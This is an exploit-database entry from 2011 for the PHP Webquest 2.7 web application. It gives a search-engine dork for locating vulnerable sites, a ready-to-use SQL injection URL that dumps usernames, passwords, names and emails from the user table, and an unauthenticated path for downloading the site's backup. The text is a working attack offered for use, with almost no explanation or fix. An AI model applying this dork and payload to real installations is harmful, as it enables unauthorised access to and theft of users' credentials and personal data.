PHP Webquest 2.7 Multiple Vulnerabilities

2011-04-08T00:00:00
ID 1337DAY-ID-15804
Type zdt
Reporter Daniel Godoy
Modified 2011-04-08T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: PHP Webquest 2.7 Multiple Vulnerabilities
# Date: 07/04/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: PHP Webquest 2.7
# Software Link: http://phpwebquest.org/
# Dork: allinurl: soporte_derecha_w.php?id_actividad=

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
Login-Root, KikoArg, Ricota,
Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
Jordan,Animacco ,yojota, Pablin77, SPEED, Knet, Cereal,
MagnoBalt,l0ve, NetToxic,
Gusan0r, Sabertrail, Maxi Soler, Darioxhcx,r0dr1

FREE HARAKIRI!

##################################################################
[SQLi]
http://localhost/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1+UNION+SELECT+1,concat_ws%280x3a,usuario,password,nombre,apellidos,e_mail,institucion,autorizado%29,3,4,5+from+usuario--

[Remote Download Backup Vulnerability]
http://localhost/phpwebquest/admin/backup_phpwebquest.php
###################################################################



#  0day.today [2018-01-08]  #